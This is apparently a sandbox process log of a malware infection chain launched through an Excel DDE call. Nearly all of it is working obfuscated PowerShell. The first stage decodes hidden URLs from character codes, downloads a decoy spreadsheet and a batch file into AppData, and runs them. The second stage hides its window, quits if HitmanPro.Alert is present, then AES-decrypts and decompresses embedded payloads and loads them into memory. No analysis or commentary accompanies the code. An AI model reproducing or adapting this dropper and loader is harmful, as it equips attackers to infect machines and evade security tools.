powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function bbxgiw($ZAcSVGmUSb, $IBxvpBHeyGkPf){[IO.File]::WriteAllBytes($ZAcSVGmUSb, $IBxvpBHeyGkPf)};function ojlXybZLvZhi($ZAcSVGmUSb){if($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51014,51022,51022))) -eq $True){rundll32.exe $ZAcSVGmUSb }elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51026,51029,50963))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $ZAcSVGmUSb}elseif($ZAcSVGmUSb.EndsWith((sfWXxnhzozpkMF @(50960,51023,51029,51019))) -eq $True){misexec /qn /i $ZAcSVGmUSb}else{Start-Process $ZAcSVGmUSb}};function ZTShcLKVojjjn($ttPNcPNxWlHASCPq){$otBKtBGsNwWYWr = New-Object (sfWXxnhzozpkMF @(50992,51015,51030,50960,51001,51015,51012,50981,51022,51019,51015,51024,51030));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$IBxvpBHeyGkPf = $otBKtBGsNwWYWr.DownloadData($ttPNcPNxWlHASCPq);return $IBxvpBHeyGkPf};function sfWXxnhzozpkMF($nnOzoG){$ZlNUzHDh=50914;$LhJJuezpiYtrmWA=$Null;foreach($ftpbeyTmSNIRDf in $nnOzoG){$LhJJuezpiYtrmWA+=[char]($ftpbeyTmSNIRDf-$ZlNUzHDh)};return $LhJJuezpiYtrmWA};function gKmyZggnNdrsx(){$FpFxTClibKgYisv = $env:AppData + '\';$XBjwOTFpNLUOLiDA = $FpFxTClibKgYisv + '222.xlsx';If(Test-Path -Path $XBjwOTFpNLUOLiDA){Invoke-Item $XBjwOTFpNLUOLiDA;}Else{ $hdzdewyeMxNBT = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,50964,50964,50964,50960,51034,51022,51029,51034));bbxgiw $XBjwOTFpNLUOLiDA $hdzdewyeMxNBT;Invoke-Item $XBjwOTFpNLUOLiDA;};$hfUJdR = $FpFxTClibKgYisv + 'xD.bat'; if (Test-Path -Path $hfUJdR){ojlXybZLvZhi $hfUJdR;}Else{ $xCTSEEhGQY = ZTShcLKVojjjn (sfWXxnhzozpkMF @(51018,51030,51030,51026,50972,50961,50961,50963,50971,50965,50960,50964,50964,50964,50960,50971,50968,50960,50963,50964,50966,50972,50969,50964,50970,50969,50961,51034,50982,50960,51012,51011,51030));bbxgiw $hfUJdR $xCTSEEhGQY;ojlXybZLvZhi $hfUJdR;};;;;}gKmyZggnNdrsx;
2176EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office15\EXCEL.EXE" /dde
2332cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\test22\AppData\Roaming\xD.bat';$wGtl='LowQGLawQGLdwQGL'.Replace('wQGL', ''),'ElfxQUemfxQUenfxQUtAfxQUtfxQU'.Replace('fxQU', ''),'FUtjArUtjAomUtjABasUtjAe6UtjA4UtjAStrUtjAingUtjA'.Replace('UtjA', ''),'GeOQGltOQGlCurOQGlrOQGleOQGlntOQGlPrOQGloOQGlcesOQGlsOQGl'.Replace('OQGl', ''),'EsWNTntsWNTryPsWNToisWNTntsWNT'.Replace('sWNT', ''),'MaieNXOnMoeNXOdueNXOleNXOeeNXO'.Replace('eNXO', ''),'TrOcAbansOcAbfoOcAbrmFOcAbiOcAbnaOcAblBOcAblocOcAbkOcAb'.Replace('OcAb', ''),'Splwhduiwhdutwhdu'.Replace('whdu', ''),'InPTvuvokPTvuePTvu'.Replace('PTvu', ''),'CreUFVYaUFVYteUFVYDUFVYecUFVYryUFVYptUFVYoUFVYrUFVY'.Replace('UFVY', ''),'CharscrngerscrErscrxrscrtrscrerscrnsirscrorscrnrscr'.Replace('rscr', ''),'DebAhhcobAhhmbAhhprbAhhebAhhssbAhh'.Replace('bAhh', ''),'CwGRRopwGRRyTwGRRowGRR'.Replace('wGRR', ''),'ReygHbadygHbLiygHbneygHbsygHb'.Replace('ygHb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($wGtl[3])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kqXMT($FvMLi){$yuVsf=[System.Security.Cryptography.Aes]::Create();$yuVsf.Mode=[System.Security.Cryptography.CipherMode]::CBC;$yuVsf.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$yuVsf.Key=[System.Convert]::($wGtl[2])('ZPmarITq2qISishmMhAN5SieN3zSIyXHEEMkcAYPN4Y=');$yuVsf.IV=[System.Convert]::($wGtl[2])('pKL8KnX4ANOD8Ef8OdOJnQ==');$fXTHi=$yuVsf.($wGtl[9])();$KWagE=$fXTHi.($wGtl[6])($FvMLi,0,$FvMLi.Length);$fXTHi.Dispose();$yuVsf.Dispose();$KWagE;}function ymbNX($FvMLi){$BKlMi=New-Object System.IO.MemoryStream(,$FvMLi);$CmUjH=New-Object System.IO.MemoryStream;$xWgPw=New-Object System.IO.Compression.GZipStream($BKlMi,[IO.Compression.CompressionMode]::($wGtl[11]));$xWgPw.($wGtl[12])($CmUjH);$xWgPw.Dispose();$BKlMi.Dispose();$CmUjH.Dispose();$CmUjH.ToArray();}$pYGwG=[System.IO.File]::($wGtl[13])([Console]::Title);$BqtDQ=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 5).Substring(2))));$fdKjl=ymbNX (kqXMT ([Convert]::($wGtl[2])([System.Linq.Enumerable]::($wGtl[1])($pYGwG, 6).Substring(2))));[System.Reflection.Assembly]::($wGtl[0])([byte[]]$fdKjl).($wGtl[4]).($wGtl[8])($null,$null);[System.Reflection.Assembly]::($wGtl[0])([byte[]]$BqtDQ).($wGtl[4]).($wGtl[8])($null,$null); "
2800powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2864explorer.exe C:\Windows\Explorer.EXE
1236